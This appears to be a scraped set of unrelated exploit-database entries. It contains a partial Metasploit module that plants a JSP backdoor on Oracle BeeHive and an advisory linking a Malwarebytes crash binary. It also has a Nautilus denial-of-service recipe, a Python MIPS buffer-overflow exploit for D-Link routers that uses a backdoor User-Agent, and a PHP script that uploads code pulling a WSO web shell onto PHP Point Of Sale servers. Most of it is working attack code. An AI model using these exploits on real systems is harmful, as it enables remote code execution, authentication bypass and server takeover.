      'Name'           => "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method
        found in voice-servlet can be abused to write a malicious file onto the target machine, and
        gain remote arbitrary code execution under the context of SYSTEM.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          '1c239c43f521145fa8385d64a9c32243',        # Found the vuln first
          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC)
          'sinn3r'                                   # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2010-4417' ],
          [ 'ZDI', '11-020' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]
        ],
      'DefaultOptions'  =>
        {
          'RPORT' => 7777
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Oracle Beehive 2', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jun 09 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
      ], self.class)
  end


  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp'))

    if res && /RECXML Prompt Tester/ === res.body
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive')
    end

    # Init some names
    exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
    stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"

    print_status("Stager name is: #{stager_name}")
    print_status("Executable name is: #{exe_name}")

    # pwd:
    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home
    # Targeted path:
    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa
    register_files_for_cleanup(
      "../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}"
    )


    # Ok fire!
    print_status("Uploading stager...")
    res = upload_stager(stager_name, exe_name)

    # Hmm if we fail to upload the stager, no point to continue.
    unless res
      fail_with(Failure::Unknown, 'Connection timed out.')
    end

    print_status("Uploading payload...")
    upload_payload(stager_name)
  end


  # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
  def get_jsp_stager(exe_name)
    jsp = %Q|<%@ page import="java.io.*" %>
<%
  ByteArrayOutputStream buf = new ByteArrayOutputStream();
  BufferedReader reader = request.getReader();
  int tmp;
  while ((tmp = reader.read()) != -1) { buf.write(tmp); }
  FileOutputStream fostream = new FileOutputStream("#{exe_name}");
  buf.writeTo(fostream);
  fostream.close();
  Runtime.getRuntime().exec("#{exe_name}");
%>|

    # Since we're sending it as a GET request, we want to keep it smaller so
    # we gsub stuff we don't want.
    jsp.gsub!("\n", '')
    jsp.gsub!('  ', ' ')
    Rex::Text.uri_encode(jsp)
  end


  # Stager will be found under:
  # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa\
  def upload_stager(stager_name, exe_name)
    jsp_stager = get_jsp_stager(exe_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')
    send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'encode_params' => false, # Don't encode %00 for us
      'vars_get' => {
        'evaluation' => jsp_stager,
        'recxml' => "..\\#{stager_name}%00"
      }
    })
  end

  # Payload will be found under:
  # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home\
  def upload_payload(stager_name)
    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'data' => generate_payload_exe(code: payload.encoded)
    })
  end

  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end

end
HireHackking 
#####################################################################################

Application:   Malwarebytes Antivirus
Platforms:   Windows
Versions:   2.2.0.
CVE:   No CVE have been assigned
Author:   Francis Provencher of COSIG
Twitter:   @COSIG_
#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner.

(http://www.oracle.com/us/technologies/embedded/025613.htm)

#####################################################################################

============================
2) Report Timeline
============================

2015-11-28: Francis Provencher of COSIG found the issue;
2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes;
2015-12-02: Malwarebytes release a patch for this issue;

#####################################################################################

============================
3) Technical details
============================

When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

#####################################################################################

===========

4) POC
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38858.exe
HireHackking 
* Exploit Title: Gnome Nautilus [Denial of Service]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://www.gnome.org/
* Software Link: https://wiki.gnome.org/Apps/Nautilus
* Version: 3.16
* Tested on: Ubuntu 14.04, Fedora 22


Description
========================================================================
========

Gnome Nautilus <= v3.16 is vulnerable to DoS attack through a
malicious crafted file.

Details
- ------------------------------------------------------------------------
- --------
A malicious crafted file can be used to perform a DoS attack in
Nautilus. The attacker must have local
access to affected system or convince the victim to download the file
(email, web url etc.). Next time
the victim tries to open the directory that contains the malicious
file, Nautilus crashes without warning.

The file must have a `.jp2` extension and start with the JPEG
signature (`0xFFD8`).

Additional Notes
- ------------------------------------------------------------------------
- --------

This seems to happen every time Nautilus is trying to update the
thumbnail of the file.

In Ubuntu and Fedora process dies with the message:
```
Premature end of JPEG file
JPEG datastream contains no image
```

This vulnerability seems to affect all Nautilus versions prior to 3.16.

PoC
========================================================================
========

1. Create a file without a `.jp2` extension in an affected system
2. Open the file in a hex editor so it start with the JPEG signature
(`0xFFD8`)
3. Rename the file so it has the `.jp2` extension
4. Open directory with Nautilus
5. Nautilus dies without warning

Timeline
========================================================================
========

2015/10/27 - Discovered
2015/10/29 - Vendor notified at security@gnome.org

Solution
========================================================================
========

No official solution yet exists.

Work-around
- ------------------------------------------------------------------------
- --------

Disabling generation of thumbnails for all files, through Nautilus
options, will prevent Nautilus from crashing.
HireHackking 
source: https://www.securityfocus.com/bid/63234/info

Multiple Vendors are prone to a stack-based buffer-overflow vulnerability.

Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices.

The following are vulnerable:

D-Link DIR-120
D-Link DI-624S
D-Link DI-524UP
D-Link DI-604S
D-Link DI-604UP
D-Link DI-604
D-Link DIR-100
D-Link TM-G5240
PLANEX COMMUNICATIONS BRL-04UR
PLANEX COMMUNICATIONS BRL-04R
PLANEX COMMUNICATIONS BRL-04CW 

import sys
import urllib2

try:
	url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
	print str(e)
	print 'Usage: %s <target ip>' % sys.argv[0]
	sys.exit(1)

# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload  = "\x3c\x06\x43\x21" # lui     a2,0x4321
payload += "\x34\xc6\xfe\xdc" # ori     a2,a2,0xfedc
payload += "\x3c\x05\x28\x12" # lui     a1,0x2812
payload += "\x34\xa5\x19\x69" # ori     a1,a1,0x1969
payload += "\x3c\x04\xfe\xe1" # lui     a0,0xfee1
payload += "\x34\x84\xde\xad" # ori     a0,a0,0xdead
payload += "\x24\x02\x0f\xf8" # li      v0,4088
payload += "\x01\x01\x01\x0c" # syscall 0x40404

# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
jump_code =  "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08" # jr $t9
jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102

# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
if len(shellcode_p1) < 86:
	shellcode_p1 += "D" * (86 - len(shellcode_p1))
	shellcode_p2 = ""
else:
	shellcode_p2 = "DD" + payload[68:]

# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2

# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
HireHackking 
source: https://www.securityfocus.com/bid/63219/info

PHP Point Of Sale is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code in context of the application. Failed exploits may result in denial-of-service conditions. 

<?php   
$options = getopt('t:n:'); 
if(!isset($options['t'], $options['n'])) 
die("\n      [+] Simple Exploiter Point Of Sale by Gabby [+] \n Usage : php sale.php -t http://example.com -n bie.php\n 
-t http://example.com   = Target mu ..
-n bie.php             = Nama file yang mau kamu pakai...\n\n");  
   
$target =  $options['t']; 
$nama   =  $options['n']; 
$shell  = "{$target}/application/libraries/tmp-upload-images/{$nama}"; 
$target = "{$target}/application/libraries/ofc-library/ofc_upload_image.php?name={$nama}"; 
$data   = '<?php 
 system("wget http://www.example.com/wso.txt; mv wso.txt bie.php");
 fclose ( $handle ); 
 ?>'; 
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 
'Content-Type: text/plain'); 
echo "=============================================== \n"; 
echo ":   Simple Exploiter Point Of Sale by Gabby   :\n"; 
echo "=============================================== \n\n"; 
echo "[+] Upload Shell ke : {$options['t']}\n"; 
$handle = curl_init(); 
curl_setopt($handle, CURLOPT_URL, $target); 
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); 
curl_setopt($handle, CURLOPT_POSTFIELDS, $data); 
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); 
$source = curl_exec($handle); 
curl_close($handle); 
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) 
{ 
echo "[+] Exploit Sukses,.. :D\n"; 
echo "[+] {$shell}\n"; 
} 
else
{ 
die("[-] Exploit Gagal,.. :(\n"); 
} 
  
?>